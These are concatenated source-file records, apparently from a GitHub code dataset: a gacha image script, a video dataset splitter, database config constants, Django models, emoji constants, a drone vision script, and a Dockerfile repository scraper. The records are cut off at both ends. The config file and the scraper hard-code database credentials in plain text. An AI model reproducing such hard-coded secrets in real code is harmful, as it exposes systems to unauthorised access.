i==0:\n ass = random.randint(1, 150)\n if ass < 75:\n cha = random.choice(list(students.get(\"四星角色\").keys()))\n else:\n cha = random.choice(list(students.get(\"四星光锥\").keys()))\n character.append(cha)\n else:\n ass = random.randint(1, 150)\n if ass < 4:\n if ass < 2:\n cha = random.choice(list(students.get(\"五星角色\").keys()))\n else:\n cha = random.choice(list(students.get(\"五星光锥\").keys()))\n # print(cha)\n character.append(cha)\n if ass > 3 and ass < 40:\n if ass < 20:\n cha = random.choice(list(students.get(\"四星角色\").keys()))\n else:\n cha = random.choice(list(students.get(\"四星光锥\").keys()))\n character.append(cha)\n if ass > 39:\n cha = random.choice(list(students.get(\"三星光锥\").keys()))\n # print(cha)\n character.append(cha)\n i += 1\n\n # print(character)\n a = 193\n b = 221\n count = 0\n st = Image.open('data/GachaData/StarRail/bg.png')\n path =\"data/pictures/cache/\"+random_str() + '.png'\n for i in character:\n # 剪切图像\n # 发起超级融合\n\n st2 = Image.open(\"data/GachaData/StarRail/\" + i + \".png\")\n\n im = st\n mark = st2\n layer = Image.new('RGBA', im.size, (0, 0, 0, 0))\n # print(str(a)+'------'+str(b))\n layer.paste(mark, (a, b))\n a += 473\n count += 1\n if count == 5:\n b += 689\n a = 193\n out = Image.composite(layer, im, layer)\n st=out\n #st.show()\n st.save(path)\n #print(path)\n return path\nif __name__ == '__main__':\n #asyncio.run(arkGacha())\n asyncio.run(starRailGacha())","repo_name":"avilliai/Cyumis","sub_path":"plugins/gacha.py","file_name":"gacha.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38043097680","text":"import csv\nimport os, sys\nimport os.path\nimport random\n\ndef train_dev_test_split(train_pctg=0.8,\n dev_pctg=0.1,\n filesavename='data/data_file.csv'):\n \"\"\"\n Split the data into training/dev/test through a train_pctg/dev_pctg/(1 - train_pctg - dev_pctg) split.\n The split is done independently within each class so that the class distribution is maintained.\n This function requires that all of the raw .avi video data be stored in a 'VIDEO_RGB' subfolder prior to running.\n It saves a csv file into the filesavename location (must have the data folder be created before running).\n :param train_pctg: % of data to use for training (e.g. 80%)\n :param dev_pctg: % of data to use for dev (e.g. 10%)... remainder of data after train/dev to be used for test\n :param filesavepath: file path and name to save the file -- must be within data subfolder\n :return:\n \"\"\"\n\n with open(filesavename, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n\n # get subdirectories in VIDEO_RGB\n video_RGB_path = os.path.join(os.getcwd(), 'VIDEO_RGB')\n\n # only grab service folders (ignoring .DS_store type files as well)\n serve_folders = [x for x in os.listdir(video_RGB_path) if 'service' in x]\n\n # iterate over each folder, and write train/dev/test samples to csv file\n for serve_label in serve_folders:\n subpath = os.path.join(video_RGB_path, serve_label)\n\n videos = []\n for vid in os.listdir(subpath):\n\n # make sure vid is an actual file and not .DS_Store type\n if os.path.isfile(os.path.join(subpath, vid)) and not vid.startswith('.'):\n vid = os.path.splitext(vid)[0] # get the filename before .avi\n videos.append(vid)\n\n # shuffle the video names in place\n random.shuffle(videos)\n\n # split into training/dev/test sets\n train_split_ind = int(round(train_pctg * len(videos)))\n dev_split_ind = train_split_ind + int(round(dev_pctg * len(videos)))\n\n train = videos[0:train_split_ind]\n dev = videos[train_split_ind:dev_split_ind]\n test = videos[dev_split_ind:]\n\n # write output to a 3-column csv file:\n # column 1 -- whether the file is used for train, dev, or test\n # column 2 -- name of the class (the type of serve)\n # column 3 -- name of the file (excluding .avi)\n for sample in train:\n writer.writerow(['train'] + [serve_label] + [sample])\n\n # write val_size proportion to csv as validation\n for sample in dev:\n writer.writerow(['dev'] + [serve_label] + [sample])\n\n # write remaining proportion to csv as test\n for sample in test:\n writer.writerow(['test'] + [serve_label] + [sample])\n\n return\n\nif __name__ == \"__main__\":\n # set random seed\n random.seed(1)\n\n train_dev_test_split()","repo_name":"vxia777/tennis_serve_recognition","sub_path":"dataprep_split.py","file_name":"dataprep_split.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8180202562","text":"# parametrizacoes da carga\r\nQTD_LOTE_REGISTROS_PROCESSADOS_LOG = 1000\r\nPATH_ARQUIVO_LOG = \"L:\\\\Projeto_POMUC_2019\\\\Log\\\\\"\r\nNM_ARQUIVO_LOG = \"pomucgastoslog\"\r\n\r\n\r\n# utilizado para indicar a configuracao dos dados a serem importados\r\nNM_DIRETORIO_RAIZ_DADOS = \"L:\\\\Projeto_POMUC_2019\\\\Base_Bruta\\\\\" # [IPEA]\r\nNM_PREFIXO_ARQUIVO = \"Extrator\"\r\nNM_ABA_ARQUIVO_DADOS = \"Dados\"\r\nNM_PREFIXO_DIRETORIO_DADOS = \"SIOP_\"\r\nQTD_LINHAS_PRIMEIRO_REGISTRO = 2\r\n\r\n\r\n# confiuracoes do banco de dados\r\nNM_SERVER = 'MSSQL2016\\\\Pesquisa' #'CV-BMNOTE\\\\CVALUEPROD'\r\nNM_DATABASE = 'POMUC_GASTOS'\r\nNM_DRIVER = '{SQL Server Native Client 11.0}'\r\nUSER_NAME = 'Bruno'\r\nPASSWORD = '1'\r\n# nome das tabelas do banco POMUC_GASTOS\r\n#NM_TB_ACAOSIOP = \"AcaoSIOP_N\"\r\nNM_TB_ACAOSIOP = \"AcaoSIOP\"\r\n\r\n# chaves(key) das estruturas Python:dict\r\nERRO_KEY = \"ERRO\"\r\nSUCESSO_KEY = \"SUCESSO\"\r\n\r\n\r\n# utilizado para verificar os valores maximos das colunas antes da importacao\r\nARRAY_CAMPOS_STR_SIOP = ['Esfera (desc.)', \r\n 'Órgão (desc.)',\r\n 'Unidade Orçamentária (desc.)',\r\n 'Função (desc.)', \r\n 'Subfunção (desc.)',\r\n 'Programa (desc.)', \r\n 'Programa (ano, desc.)',\r\n 'Objetivo (desc.)', \r\n 'Iniciativa (desc.)', \r\n 'Ação (ano, desc.)',\r\n 'Tipo de Ação (desc.)', \r\n 'Subtipo de Ação (desc.)', \r\n 'Localizador (ano, desc.)', \r\n 'Plano Orçamentário (ano, desc.)',\r\n 'Município (desc.)',\r\n 'UF (desc.)', \r\n 'IDOC (desc.)',\r\n 'IDUSO (desc.)', \r\n 'Fonte (desc.)', \r\n 'Natureza de Despesa (desc.)', \r\n 'GND (desc.)', \r\n 'Modalidade (desc.)', \r\n 'Elemento de Despesa (desc.)']\r\n\r\n\r\n# anos que serao analisados do SIOP\r\n\"\"\"\r\nLT_ANOS_ANALISADOS_SIOP = (\"2000\", \"2001\", \"2002\", \"2003\", \"2004\",\r\n \"2005\", \"2006\", \"2007\", \"2008\", \"2009\",\r\n \"2010\", \"2011\", \"2012\", \"2013\", \"2014\",\r\n \"2015\", \"2016\", \"2017\", \"2018\", \"2019\")\r\n\"\"\"\r\nLT_ANOS_ANALISADOS_SIOP = (\"2003\", \"2011\", \"2016\")\r\n\r\n\r\n#\r\nSTR_ESTRUTURA_CLAUSULA_INSERT_SIOP = \"\"\"\r\n INSERT INTO POMUC_GASTOS.dbo.AcaoSIOP ( \r\n AnoExercicio,AnoReferencia,\r\n IdEsfera,Esfera,IdOrgao,Orgao,\r\n IdUnidadeOrcamentaria,UnidadeOrcamentaria,\r\n Poder,IdFuncao,Funcao,\r\n IdSubFuncao,SubFuncao,\r\n IdPrograma,Programa, --variavel 'AnoPrograma' retirada\r\n Objetivo,Iniciativa,\r\n IdAcao,Acao, --variavel 'AnoAcao' retirada\r\n AcaoTipo,AcaoSubTipo,\r\n LocalizadorSIOP,LocalizadorSIOPDescricao,\r\n PlanoOrcamentario, --variavel 'AnoPlanoOrcamentario' retirada\r\n Municipio,UF,\r\n IdOperacaoCredito,OperacaoCredito,\r\n IdUso,Uso,\r\n IdFonte,Fonte,\r\n IdNaturezaDespesa,NaturezaDespesa,\r\n IdGrandeNaturezaDespesa,GrandeNaturezaDespesa,\r\n IdModalidade,Modalidade,\r\n IdElementoDespesa,ElementoDespesa,\r\n ValorLOA,ValorAutorizado,\r\n ValorEmpenhado,ValorEmpenhadoLiquidado,\r\n ValorPago,ValorPagoRAPPago,\r\n ArquivoImportacao,\r\n IndiceLinha\r\n )\"\"\"\r\n\r\n\r\n#\r\nARRAY_CAMPOS_SIOP = ['AnoExercicio',\r\n 'AnoReferencia',\r\n 'IdEsfera,Esfera',\r\n 'IdOrgao',\r\n 'Orgao',\r\n 'IdUnidadeOrcamentaria',\r\n 'UnidadeOrcamentaria',\r\n 'Poder',\r\n 'IdFuncao',\r\n 'Funcao',\r\n 'IdSubFuncao',\r\n 'SubFuncao',\r\n 'IdPrograma',\r\n 'Programa',\r\n 'Objetivo',\r\n 'Iniciativa',\r\n 'IdAcao',\r\n 'Acao',\r\n 'AcaoTipo',\r\n 'AcaoSubTipo',\r\n 'LocalizadorSIOP',\r\n 'LocalizadorSIOPDescricao',\r\n 'PlanoOrcamentario',\r\n 'Municipio',\r\n 'UF',\r\n 'IdOperacaoCredito',\r\n 'OperacaoCredito',\r\n 'IdUso',\r\n 'Uso',\r\n 'IdFonte',\r\n 'Fonte',\r\n 'IdNaturezaDespesa',\r\n 'NaturezaDespesa',\r\n 'IdGrandeNaturezaDespesa',\r\n 'GrandeNaturezaDespesa',\r\n 'IdModalidade',\r\n 'Modalidade',\r\n 'IdElementoDespesa',\r\n 'ElementoDespesa',\r\n 'ValorLOA',\r\n 'ValorAutorizado',\r\n 'ValorEmpenhado',\r\n 'ValorEmpenhadoLiquidado',\r\n 'ValorPago',\r\n 'ValorPagoRAPPago',\r\n 'ArquivoImportacao',\r\n 'IndiceLinha']\r\n\r\n","repo_name":"bmsmiranda/myportfolio","sub_path":"IPEA/POMUC-GASTOS-2019-2020/GASTOS_CARGA_SIOP/pomucgastos_constantes.py","file_name":"pomucgastos_constantes.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15219747076","text":"# coding=utf-8\nimport uuid\nfrom django.db import models\nfrom django.contrib.postgres.fields import IntegerRangeField, DateTimeRangeField\nfrom django.utils.timezone import localtime\nfrom psycopg2.extras import NumericRange\n\nfrom apps.common.models import AbstractObservation\n\n\nclass Zsj(models.Model):\n \"\"\"Basic residential unit in the Czech rep., officially called 'Zakladni\n sidelni jednotka'.\"\"\"\n id_by_provider = models.CharField(\n help_text=\"ID of the ZSJ used by Czech law.\",\n max_length=100,\n editable=False\n )\n name = models.CharField(\n help_text=\"Human-readable name of the ZSJ.\",\n max_length=100\n )\n\n class Meta:\n ordering = ['name']\n\n def __str__(self):\n return self.name + ', ' + self.id_by_provider\n\n\nclass MobilityStream(models.Model):\n \"\"\"Mobility stream from one ZSJ to another.\"\"\"\n src_zsj = models.ForeignKey(\n Zsj,\n help_text=\"Source ZSJ, where people are departing.\",\n related_name='arrival_streams',\n editable=False,\n on_delete=models.DO_NOTHING\n )\n dst_zsj = models.ForeignKey(\n Zsj,\n help_text=\"Destination ZSJ, where people are arriving.\",\n related_name='to_streams',\n editable=False,\n on_delete=models.DO_NOTHING\n )\n opposite = models.OneToOneField(\n 'self',\n help_text=\"Stream in opposite direction to this stream.\",\n editable=False,\n null=True,\n on_delete=models.DO_NOTHING\n )\n\n class Meta:\n ordering = ['src_zsj__name', 'dst_zsj__name']\n unique_together = (\n (\n 'src_zsj',\n 'dst_zsj',\n ),\n )\n\n def __str__(self):\n return self.src_zsj.name + '->' + self.dst_zsj.name\n\n\nANY_OCCURRENCE = \"0\"\nTRANSIT_OCCURRENCE = \"1\"\nVISIT_OCCURRENCE = \"2\"\nOCCURRENCE_CHOICES = (\n (ANY_OCCURRENCE, 'Any'),\n (TRANSIT_OCCURRENCE, 'Transit'),\n (VISIT_OCCURRENCE, 'Visit'),\n)\n\nUNIQUES_ALL = \"0\"\nUNIQUES_UNIQUE = \"1\"\nUNIQUES_CHOICES = (\n (UNIQUES_ALL, 'All'),\n (UNIQUES_UNIQUE, 'Uniques'),\n)\n\n\nclass MobilityObservation(AbstractObservation):\n feature_of_interest = models.ForeignKey(\n MobilityStream,\n help_text=\"Stream station where the observation was taken.\",\n editable=False,\n on_delete=models.DO_NOTHING\n )\n src_occurrence_type = models.CharField(\n help_text=\"Occurrence type in the source ZSJ.\",\n max_length=1,\n choices=OCCURRENCE_CHOICES,\n default=ANY_OCCURRENCE,\n )\n dst_occurrence_type = models.CharField(\n help_text=\"Occurrence type in the destination ZSJ.\",\n max_length=1,\n choices=OCCURRENCE_CHOICES,\n default=ANY_OCCURRENCE,\n )\n uniques_type = models.CharField(\n help_text=\"All or only uniques.\",\n max_length=1,\n choices=UNIQUES_CHOICES,\n default=UNIQUES_ALL,\n )\n result = models.PositiveIntegerField(\n help_text=\"Numerical value of the measured phenomenon in units \"\n \"specified by Process.\",\n null=True,\n editable=False,\n )\n\n @property\n def result_for_human(self):\n if self.result is not None:\n res_str = \"{}\".format(self.result)\n else:\n reason = self.result_null_reason\n if(reason == 'HTTP Error 204'):\n reason = 'differential privacy'\n res_str = 'unknown because of ' + reason\n return res_str\n result_for_human.fget.short_description = 'Result'\n\n class Meta:\n get_latest_by = 'phenomenon_time_range'\n ordering = [\n '-phenomenon_time_range',\n 'feature_of_interest',\n 'procedure',\n 'observed_property',\n 'src_occurrence_type',\n 'dst_occurrence_type',\n 'uniques_type',\n ]\n # unique_together see migration 0008 and 0009, index o2_mobilityobservation_uniq\n\n def __str__(self):\n pt_l_local = localtime(self.phenomenon_time_range.lower)\n pt_u_local = localtime(self.phenomenon_time_range.upper)\n\n return \"{} from {} to {} on {} ({} -> {}, {}) was {}\".format(\n self.observed_property.name,\n self.feature_of_interest.src_zsj.name,\n self.feature_of_interest.dst_zsj.name,\n pt_l_local.strftime('%Y-%m-%d'),\n u'{}–{}'.format(\n pt_l_local.strftime('%H:%M'),\n pt_u_local.strftime('%H:%M'),\n ),\n self.get_src_occurrence_type_display(),\n self.get_dst_occurrence_type_display(),\n self.get_uniques_type_display(),\n self.result_for_human,\n )\n\n\nANY_GENDER = \"-\"\nMALE_GENDER = \"m\"\nFEMALE_GENDER = \"f\"\nGENDER_CHOICES = (\n (ANY_GENDER, 'Any'),\n (MALE_GENDER, 'Male'),\n (FEMALE_GENDER, 'Female'),\n)\n\nclass SocioDemoObservation(AbstractObservation):\n feature_of_interest = models.ForeignKey(\n Zsj,\n help_text=\"ZSJ where the observation was taken.\",\n editable=False,\n on_delete=models.DO_NOTHING\n )\n age = IntegerRangeField(\n help_text=\"Age of the population.\",\n editable=False,\n )\n def age_for_human(self):\n if(self.age.lower==0 and self.age.upper is None):\n age = 'Any age'\n else:\n if self.age.upper is None:\n age = '{}+ years'.format(self.age.lower)\n else:\n upper = self.age.upper\n if not self.age.upper_inc:\n upper -= 1\n age = '{}–{} years'.format(\n self.age.lower,\n upper\n )\n return age\n age_for_human.short_description = 'Age'\n age_for_human.admin_order_field = 'age'\n\n gender = models.CharField(\n help_text=\"Gender of the population.\",\n max_length=1,\n choices=GENDER_CHOICES,\n editable=False,\n default=ANY_GENDER,\n )\n occurrence_type = models.CharField(\n help_text=\"Occurrence type in the ZSJ.\",\n max_length=1,\n choices=OCCURRENCE_CHOICES,\n editable=False,\n )\n result = models.PositiveIntegerField(\n help_text=\"Numerical value of the measured phenomenon in units \"\n \"specified by Process.\",\n null=True,\n editable=False,\n )\n\n @property\n def result_for_human(self):\n if self.result is not None:\n res_str = \"{}\".format(self.result)\n else:\n reason = self.result_null_reason\n if(reason == 'HTTP Error 204'):\n reason = 'differential privacy'\n res_str = 'unknown because of ' + reason\n return res_str\n result_for_human.fget.short_description = 'Result'\n\n class Meta:\n get_latest_by = 'phenomenon_time_range'\n ordering = [\n '-phenomenon_time_range',\n 'feature_of_interest',\n 'observed_property',\n 'procedure',\n 'age',\n 'gender',\n 'occurrence_type',\n ]\n # unique_together see migration 0008 and 0009, index o2_sociodemoobservation_uniq\n\n def __str__(self):\n pt_l_local = localtime(self.phenomenon_time_range.lower)\n pt_u_local = localtime(self.phenomenon_time_range.upper)\n\n if(self.age.lower==0 and self.age.upper is None):\n age = 'Any age'\n else:\n age = u'{}–{} years'.format(\n self.age.lower,\n getattr(self.age, 'upper', u'∞')\n )\n\n return \"{} of {} on {} at {} ({}, {}, {}) was {}\".format(\n self.observed_property.name,\n self.feature_of_interest.name,\n pt_l_local.strftime('%Y-%m-%d'),\n u'{}–{}'.format(\n pt_l_local.strftime('%H:%M'),\n pt_u_local.strftime('%H:%M'),\n ),\n age,\n self.get_gender_display() + ' gender',\n self.get_occurrence_type_display(),\n self.result_for_human,\n )\n","repo_name":"gis4dis/poster","sub_path":"apps/processing/o2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"41316870851","text":"# -*- coding: utf-8\nfrom emoji import emojize\nbattery = emojize(\":battery:\")\nlow_battery = emojize(\":low_battery:\")\nelectric_plug = emojize(\":electric_plug:\")\nlaptop = emojize(\":laptop:\")\ndesktop_computer = emojize(\":desktop_computer:\")\nprinter = emojize(\":printer:\")\nkeyboard = emojize(\":keyboard:\")\ncomputer_mouse = emojize(\":computer_mouse:\")\ntrackball = emojize(\":trackball:\")\ncomputer_disk = emojize(\":computer_disk:\")\nfloppy_disk = emojize(\":floppy_disk:\")\noptical_disk = emojize(\":optical_disk:\")\ndvd = emojize(\":dvd:\")\nabacus = emojize(\":abacus:\")\n","repo_name":"numengo/python-vishuda","sub_path":"vishuda/models/emojis/objects/computer.py","file_name":"computer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70084663841","text":"import cv2 \nimport time\nimport numpy as np\nfrom VisionLib import black_line,vision_debug,color_recognition\nfrom typing import List, Optional, Tuple, Union\nfrom PIL import Image \nimport serial\nimport time\nimport binascii\nmode=1\nmove_x=\"00\"\nmove_y=\"00\"\nmove_yaw=\"00\"\nmode=0x01\nser0 = serial.Serial('/dev/ttyAMA0',460800)\nif ser0.isOpen ==False:\n ser0.open()\nif __name__ == '__main__':\n \n cap = cv2.VideoCapture(0)\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640.0)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480.0)\n cap.set(cv2.CAP_PROP_FOURCC,cv2.VideoWriter_fourcc('M','J','P','G'))\n LOWER = np.array([0, 0, 0])\n UPPER = np.array([100, 100 ,100])\n red=0\n t=0\n while True:\n ret,frame = cap.read()\n result=color_recognition(frame)\n print(result)\n if result == \"red\" :\n t=t+10\n else :\n t=t-10\n if t >=50 :\n red=1\n if t<=20 :\n red=0\n if t>=80:\n t=80\n if t<=0 :\n t=0\n print(red)\n ","repo_name":"DBLYBB/UAV_2023","sub_path":"UAV-Code/mypython/Test/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"4750600641","text":"from pymongo import MongoClient\nfrom bson import json_util\n\nimport requests as rq\nfrom bs4 import BeautifulSoup\n\nimport MySQLdb\nimport json\nimport threading\nimport re\nimport sys\nimport traceback\nimport os\nimport time\nimport yaml\nimport json\nimport queue\n\nfrom datetime import datetime\n\nfrom github import Github, GithubException\n\nprint(\"Executando scrapper...\")\n\nmyDB = MySQLdb.connect(host=\"127.0.0.1\",port=3306,user=\"devops\",passwd=\"BHU*nji9\",db=\"devops\")\ncHandler = myDB.cursor()\ncHandler.execute(\"SELECT * FROM dockerfile\")\nresults = cHandler.fetchall()\n\nprint(\"Banco de dados lido...\")\n\nclient = MongoClient()\ndb = client['repos-database']\nmongoRepos = db['repos']\nmongoDockerFiles = db['dockerfile_repos']\nheaders = {'user-agent':'Mozilla/5.0'}\n\ntokens = []\nwith open(\"./resources/tokens.txt\",'r',encoding='utf-8') as tokenFile:\n for token in tokenFile:\n tokens.append(token.strip())\n\ndef repoExtractGit(id,repoName,token,dockerfilePath,resultQueue=None):\n repoId = None\n repoQuery = mongoRepos.find_one({\"name\":repoName})\n try:\n if(repoQuery is None):\n urlRepo = \"https://github.com/\"+repoName\n pageRepo = rq.get(urlRepo,headers=headers)\n if(not pageRepo.status_code == 404):\n path = re.sub('https://github.com/','',pageRepo.url)\n if(repoName!=path):\n repoName=path\n repoQuery = mongoRepos.find_one({\"name\":repoName})\n if(repoQuery is None):\n g = Github(token)\n repo = g.get_repo(path)\n repoId = mongoRepoInsert(repoName,repo)\n repoQuery = mongoRepos.find_one({\"name\":repoName})\n if(repoQuery is None):\n print(\"Repositório Vazio!\")\n resultQueue.put((id,\"done\"))\n return None\n else:\n print(\"Repositório Inexistente!\")\n resultQueue.put((id,\"done\"))\n return None\n dockerfileExtract(repoName,dockerfilePath,repoQuery)\n print(\"Dockerfile \"+str(id)+\" salvo\")\n resultQueue.put((id,\"done\"))\n return repoId\n except rq.exceptions.ReadTimeout:\n print(\"ReadTimeout, tentando novamente\")\n return repoExtractGit(id,repoName,token,dockerfilePath,resultQueue)\n except GithubException as e:\n print(\"Ocorreu um erro na requisição do github : \"+e.data['message'])\n resultQueue.put((id,\"done\"))\n print(\"Sai do Thread \"+str(id))\n except rq.exceptions.ConnectionError:\n print(\"ConnectionErro, tentando novamente\")\n return repoExtractGit(id,repoName,token,dockerfilePath,resultQueue)\n return repoId\n\ndef mongoRepoInsert(repoName,g):\n try:\n urlRepo = \"https://github.com/\"+repoName+\"/tree/\"+g.default_branch\n urlReadme = \"https://raw.githubusercontent.com/\"+repoName+\"/\"+g.default_branch+\"/README.md\"\n pageRepo = rq.get(urlRepo,headers=headers)\n pageReadme = rq.get(urlReadme,headers=headers)\n infos={}\n bsRepo = BeautifulSoup(pageRepo.text,\"html.parser\")\n language = bsRepo.find(\"ol\",attrs={'class':'repository-lang-stats-numbers'})\n if(language!=None):\n languages = language.find_all(\"a\")\n language = {}\n for l in languages:\n language[l.find(\"span\",attrs={'class':'lang'}).text]=float(re.sub('%','',l.find(\"span\",attrs={'class':'percent'}).text))/100\n language=dict(language)\n infos[\"languagues\"]=language\n infos[\"watchers\"] = int(g.watchers_count)\n infos[\"stars\"] = int(g.stargazers_count)\n infos[\"forks\"] = int(g.forks_count)\n infos[\"created_at\"] = g.created_at\n infos[\"updated_at\"] = g.updated_at\n infos[\"default_branch\"] = g.default_branch\n if(not pageRepo.status_code==404 and not bsRepo.find('div',attrs={'class':'blankslate blankslate-narrow'})):\n infos[\"commits\"] = getTotalByApi(bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(1) > a > span'),repoName,\"commits\")\n infos[\"branches\"] = getTotalByApi(bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(2) > a > span'),repoName,\"branches\")\n infos[\"releases\"] = getTotalByApi(bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(3) > a > span'),repoName,\"releases\")\n repoLicense = bsRepo.find(\"ul\",attrs={\"class\":'numbers-summary'}).select('li:nth-of-type(5)')\n if not repoLicense:\n repoLicense=None\n else:\n repoLicense = repoLicense[0].text.strip()\n else :\n return None\n infos[\"license\"] = repoLicense\n forkedFrom = None\n if(g.fork and mongoRepos.find_one({\"name\":g.parent.full_name})):\n forkedFrom = mongoRepos.find_one({\"name\":g.parent.full_name})\n elif(g.fork):\n print(g.parent.full_name)\n forkedFrom = mongoRepoInsert(g.parent.full_name,g.parent)\n infos[\"forked_from\"] = forkedFrom\n infos[\"readme\"] = BeautifulSoup(pageReadme.text,\"html.parser\").text\n infos[\"url\"] = urlRepo\n infos[\"name\"] = repoName\n return mongoRepos.insert_one(infos).inserted_id\n except rq.exceptions.ConnectionError:\n print(\"ConnectionErro, tentando novamente\")\n return mongoRepoInsert(repoName,g)\n\n\ndef getTotalByApi(bs,repoName,item):\n if(bs == None):\n return getLastPagination(repoName,item)\n else:\n return int(re.sub(',','',bs[0].text.strip()))\n\ndef getLastPagination(repoName,item):\n url = \"https://api.github.com/repos/\"+repoName+\"/\"+item+\"?per_page=1\"\n response = rq.get(url,headers=headers)\n link = response.info().get('Link')\n return int(re.match('.*=(.*)>; rel=\"last\"',link).group(1))\n\ndef dockerfileExtract(repoName, dockerfilePath, mongoRepoInstance):\n savedDockerFile = mongoDockerFiles.find_one({\"repoName\":repoName,\"path\":dockerfilePath})\n if(savedDockerFile is None):\n urlDockerfile = \"https://github.com/\"+repoName+\"/blob/\"+mongoRepoInstance.get('default_branch')+\"/\"+dockerfilePath\n page = rq.get(urlDockerfile,headers=headers)\n # ========================================================\n parsed_page = BeautifulSoup(page.text,\"html.parser\").find(\"table\",attrs={'class':'highlight tab-size js-file-line-container'})\n dockerfile = {}\n dockerfileRepo = {}\n dockerfileRepo[\"repo\"]=mongoRepoInstance.get('_id')\n dockerfileRepo[\"repoName\"]=repoName\n dockerfileRepo[\"path\"]=dockerfilePath\n if(parsed_page!=None and parsed_page.find_all(\"td\",attrs={'class':'blob-code blob-code-inner js-file-line'})!=None):\n env=0\n previousDockerLine=\"\"\n dictKey=\"Config1\"\n dockerfile[dictKey]={}\n for td in parsed_page.find_all(\"td\",attrs={'class':'blob-code blob-code-inner js-file-line'}):\n td = td.text.strip()\n if(td.lower().startswith(\"from \")):\n #dockerFrom.append(re.match('\\w{4} (.*)',td).group(1))\n env+=1\n dictKey=\"Config\"+str(env)\n if dictKey in dockerfile:\n dockerfile[dictKey][\"FROM\"]=re.match('\\w{4} (.*)',td).group(1)\n else:\n dockerfile[dictKey]={\"FROM\":re.match('\\w{4} (.*)',td).group(1)}\n previousDockerLine = \"FROM\"\n elif(td.lower().startswith(\"run \")):\n #dockerRun.append(re.match('\\w{3} (.*)',td).group(1))\n if \"RUN\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"RUN\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"RUN\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"RUN\"\n elif(td.lower().startswith(\"add \")):\n #dockerAdd.append(re.match('\\w{3} (.*)',td).group(1))\n if \"ADD\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ADD\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ADD\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"ADD\"\n elif(td.lower().startswith(\"workdir \")):\n #dockerWorkdir.append(re.match('\\w{7} (.*)',td).group(1))\n if \"WORKDIR\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"WORKDIR\"].append(re.match('\\w{7} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"WORKDIR\"]=[re.match('\\w{7} (.*)',td).group(1)]\n previousDockerLine = \"WORKDIR\"\n elif(td.lower().startswith(\"expose \")):\n #dockerExpose.append(re.match('\\w{6} (.*)',td).group(1))\n if \"EXPOSE\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"EXPOSE\"].append(re.match('\\w{6} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"EXPOSE\"]=[re.match('\\w{6} (.*)',td).group(1)]\n previousDockerLine = \"EXPOSE\"\n elif(td.lower().startswith(\"copy \")):\n #dockerCopy.append(re.match('\\w{4} (.*)',td).group(1))\n if \"COPY\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"COPY\"].append(re.match('\\w{4} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"COPY\"]=[re.match('\\w{4} (.*)',td).group(1)]\n previousDockerLine = \"COPY\"\n elif(td.lower().startswith(\"entrypoint \")):\n #dockerEntrypoint.append(re.match('\\w{10} (.*)',td).group(1))\n if \"ENTRYPOINT\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ENTRYPOINT\"].append(re.match('\\w{10} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ENTRYPOINT\"]=[re.match('\\w{10} (.*)',td).group(1)]\n previousDockerLine = \"ENTRYPOINT\"\n elif(td.lower().startswith(\"cmd \")):\n #dockerCmd.append(re.match('\\w{3} (.*)',td).group(1))\n if \"CMD\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"CMD\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"CMD\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"CMD\"\n elif(td.lower().startswith(\"volume \")):\n #dockerVolume.append(re.match('\\w{6} (.*)',td).group(1))\n if \"VOLUME\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"VOLUME\"].append(re.match('\\w{6} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"VOLUME\"]=[re.match('\\w{6} (.*)',td).group(1)]\n previousDockerLine = \"VOLUME\"\n elif(td.lower().startswith(\"user \")):\n #dockerUser.append(re.match('\\w{4} (.*)',td).group(1))\n if \"USER\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"USER\"].append(re.match('\\w{4} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"USER\"]=[re.match('\\w{4} (.*)',td).group(1)]\n previousDockerLine = \"USER\"\n elif(td.lower().startswith(\"label \")):\n #dockerLabel.append(re.match('\\w{5} (.*)',td).group(1))\n if \"LABEL\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"LABEL\"].append(re.match('\\w{5} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"LABEL\"]=[re.match('\\w{5} (.*)',td).group(1)]\n previousDockerLine = \"LABEL\"\n elif(td.lower().startswith(\"arg \")):\n #dockerArg.append(re.match('\\w{3} (.*)',td).group(1))\n if \"ARG\" in 